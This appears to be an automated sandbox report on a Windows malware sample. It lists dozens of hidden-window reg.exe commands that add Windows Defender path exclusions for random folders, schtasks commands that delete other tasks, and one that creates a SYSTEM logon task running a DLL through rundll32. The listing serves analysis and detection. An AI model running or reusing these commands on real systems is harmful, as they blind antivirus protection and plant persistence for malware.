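Technical Information
The entries below are behaviours recorded for the sample. The sub-headings that normally group such a list are not present here, so the grouping has to be read from the entries themselves: a scheduled-task file under <SYSTEM32>\tasks, Windows Defender path-exclusion registry values (set under both the Policies and non-Policies keys, including their Wow6432Node counterparts), file-system paths, and the command lines of launched processes.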
- <SYSTEM32>\tasks\gjnfbdwha
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\UVrNbaZbhgrdC' = '0'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\cRHunKoNTIE' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\cRHunKoNTIE' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\sIXMRvRtOmUn' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\aVlQuiEOU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\cRHunKoNTIE' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\sIXMRvRtOmUn' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\gpONkMBmPnKIKHVB' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\gpONkMBmPnKIKHVB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\BzogYFlOwXble' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\BzogYFlOwXble' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\BzogYFlOwXble' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\TTBPjMxBgHvGknSQj' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\sIXMRvRtOmUn' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\gpONkMBmPnKIKHVB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\aVlQuiEOU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\aVlQuiEOU' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\XmryStnxtZkU2' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\aVlQuiEOU' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\cRHunKoNTIE' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\sIXMRvRtOmUn' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\gpONkMBmPnKIKHVB' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\BzogYFlOwXble' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\TTBPjMxBgHvGknSQj' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\XmryStnxtZkU2' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\CqgKpIrHPZQDrFFU' = '0'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\CqgKpIrHPZQDrFFU' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\CqgKpIrHPZQDrFFU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\UVrNbaZbhgrdC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\UVrNbaZbhgrdC' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\UVrNbaZbhgrdC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\XmryStnxtZkU2' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\XmryStnxtZkU2' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\CqgKpIrHPZQDrFFU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\TTBPjMxBgHvGknSQj' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\TTBPjMxBgHvGknSQj' = '00000000'
- %WINDIR%\temp\cqgkpirhpzqdrffu\jrhkwdcgzxejbgzn.vbs
- %WINDIR%\temp\cqgkpirhpzqdrffu\jrhkwdcgzxejbgzn.vbs
- <SYSTEM32>\tasks\gjnfbdwha
- %PROGRAMDATA%\ntuser.pol
- '%WINDIR%\syswow64\wscript.exe' "%WINDIR%\Temp\CqgKpIrHPZQDrFFU\jrHKWdCgZXEJBgZN.vbs"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "wMUPrTBFsNolKieCh"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "weYOQYrXJtEViiwJW2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "weYOQYrXJtEViiwJW2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "weYOQYrXJtEViiwJW"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "weYOQYrXJtEViiwJW"
- '<SYSTEM32>\taskeng.exe' {BFE8580A-4166-443E-A95E-3EA05D51F6BE} S-1-5-21-1960123792-2022915161-3775307078-1001:arudjdx\user:Interactive:[1]
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gjnFBdwhA"
- '%WINDIR%\syswow64\schtasks.exe' /run /tn "gjnFBdwhA"
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "gjnFBdwhA" /SC once /ST 00:05:20 /F /RU "user" /TR "cmd.exe /c start /min gpupdate.exe /force /target:computer"
- '<SYSTEM32>\raserver.exe' /offerraupdate
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "wMUPrTBFsNolKieCh"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "wMUPrTBFsNolKieCh2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "wMUPrTBFsNolKieCh2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ibSCmdpveRdJbAIsfkf"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "sxUIfhIdgMVQN"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "sxUIfhIdgMVQN"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "jnetkgFFTGgWcc"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "jnetkgFFTGgWcc"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "iAwPBcappHKwkKJ2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "iAwPBcappHKwkKJ2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "iAwPBcappHKwkKJ"
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TR "rundll32 \"%ProgramFiles(x86)%\aVlQuiEOU\kZiQgW.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "XgrLFQlVJERwHRR" /V1 /F
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "iAwPBcappHKwkKJ"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "zLwmGpWeVXANGlwPyyh2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "zLwmGpWeVXANGlwPyyh2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "zLwmGpWeVXANGlwPyyh"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "zLwmGpWeVXANGlwPyyh"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ibSCmdpveRdJbAIsfkf2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ibSCmdpveRdJbAIsfkf2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ibSCmdpveRdJbAIsfkf"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "sxUIfhIdgMVQN2"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C mkdir "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" && copy nul "%WINDIR%\Temp\CqgKpIrHPZQDrFFU\jrHKWdCgZXEJBgZN.vbs"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:64
